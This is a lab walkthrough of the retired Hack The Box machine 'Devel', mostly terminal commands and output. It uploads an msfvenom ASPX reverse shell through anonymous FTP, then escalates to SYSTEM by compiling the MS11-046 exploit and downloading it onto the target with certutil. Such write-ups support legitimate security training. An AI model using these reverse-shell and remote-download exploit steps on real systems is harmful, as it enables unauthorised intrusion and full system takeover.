HTB Walkthrough: Devel w/o Metasploit (retired)

Devel is a retired box on HTB and is part of TJ Null’s OCSP-like boxes.

Hostname: Devel | Difficulty Level: Easy | Operating System: Windows

NMAP Scan

┌──(kali㉿kali)-[~/labs/HTB/Devel]
└─$ nmap -sC -sV -oA Devel 10.10.10.5
Starting Nmap 7.91 ( https://nmap.org ) at 2021–04–13 12:21 EDT
Nmap scan report for 10.10.10.5
Host is up (0.022s latency).
Not shown: 998 filtered ports
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03–18–17 02:06AM <DIR> aspnet_client
| 03–17–17 05:37PM 689 iisstart.htm
|_03–17–17 05:37PM 184946 welcome.png
| ftp-syst:
|_ SYST: Windows_NT
80/tcp open http Microsoft IIS httpd 7.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Ports 21 (FTP) and 80 (HTTP) are open.

Enumeration

Since anonymous login is allowed. Enter username as anonymous and blank password.
┌──(kali㉿kali)-[~/labs/HTB/Devel]
└─$ ftp 10.10.10.5
Connected to 10.10.10.5.
220 Microsoft FTP Service
Name (10.10.10.5:kali): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in
ftp> put test.html
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
03–18–17 02:06AM <DIR> aspnet_client
03–17–17 05:37PM 689 iisstart.htm
04–14–21 12:55AM 38 test.html
03–17–17 05:37PM 184946 welcome.png

┌──(kali㉿kali)-[~/labs/HTB/Devel]
└─$ cat test.html
<html><body>Hello dude</body></html>

Now browse to http://10.10.10.5/test.html and you will see ‘Hello dude’. So, it confirms that we can upload a file and run it.

Exploitation

IIS generally executes ASP or ASPX (ASP.NET). Generating ASPX reverse shell:
┌──(kali㉿kali)-[~/labs/HTB/Devel]
└─$ msfvenom -p windows/shell_reverse_tcp -f aspx LHOST=10.10.14.14 LPORT=9876 -o reverse-shell.aspx

Putting the above generated reverse shell script in FTP server. Open a netcat session in another tab of your kali machine.

ftp> put reverse-shell.aspx
local: reverse-shell.aspx remote: reverse-shell.aspx
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
2752 bytes sent in 0.00 secs (11.4109 MB/s)
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
03–18–17 02:06AM <DIR> aspnet_client
03–17–17 05:37PM 689 iisstart.htm
04–14–21 01:47AM 2752 reverse-shell.aspx
03–17–17 05:37PM 184946 welcome.png

Browse to http://10.10.10.5/reverse-shell.aspx and you will get a reverse shell. We need to escalate to user babis. It might contain user flag.

c:\windows\system32\inetsrv>whoami
whoami
iis apppool\web
c:\Users>cd babis
cd babis
Access is denied.

c:\Users>cd Administrator
cd Administrator
Access is denied.

Privilege Escalation

Enumerating OS using below command:
c:\Users>systeminfo | findstr /B /C:”OS Name” /C:”OS Version”
systeminfo | findstr /B /C:”OS Name” /C:”OS Version”
OS Name: Microsoft Windows 7 Enterprise
OS Version: 6.1.7600 N/A Build 7600

The ‘systeminfo’ command results into ‘Hotfix(s): N/A’, it maybe vulnerable to Kernel exploit. Google search for ‘kernel exploit window 7 Build 7600’ and refer this link: https://github.com/abatchy17/WindowsExploits/blob/master/MS11-046/40564.c . This will hint of the machine being vulnerable to ms11–046.

We can find the same exploit in searchsploit.
┌──(kali㉿kali)-[~/labs/HTB/Devel]
└─$ searchsploit ms11–046
Exploit title: Microsoft Windows (x86) — ‘afd.sys’ Local Privilege Escalation (MS11–046)
┌──(kali㉿kali)-[~/labs/HTB/Devel]
└─$ searchsploit -m windows_x86/local/40564.c

Rename the exploit to priv.c. We need to compile priv.c for that we need mingw-w64.
Install mingw-w64:
(a) sudo apt-get update
(b) sudo apt-get install mingw-w64

Refer this site for exploitation: https://vk9-sec.com/microsoft-windows-x86-afd-sys-local-privilege-escalation-ms11-046-2011-1249/
┌──(kali㉿kali)-[~/labs/HTB/Devel]
└─$ i686-w64-mingw32-gcc priv.c -o MS11–046.exe -lws2_32
┌──(kali㉿kali)-[~/labs/HTB/Devel]
└─$ chmod +x MS11–046.exe

Transfer the file to target machine.
On kali: python -m SimpleHTTPServer
On Target:
(a) cd %temp%
(b) certutil -urlcache -f http://10.10.14.14:8000/MS11-046.exe exploit.exe

Running the exploit and getting admin access.
C:\Windows\Temp>exploit.exe
exploit.exe

c:\Windows\System32>whoami
whoami
nt authority\system
And you will get root and user flag.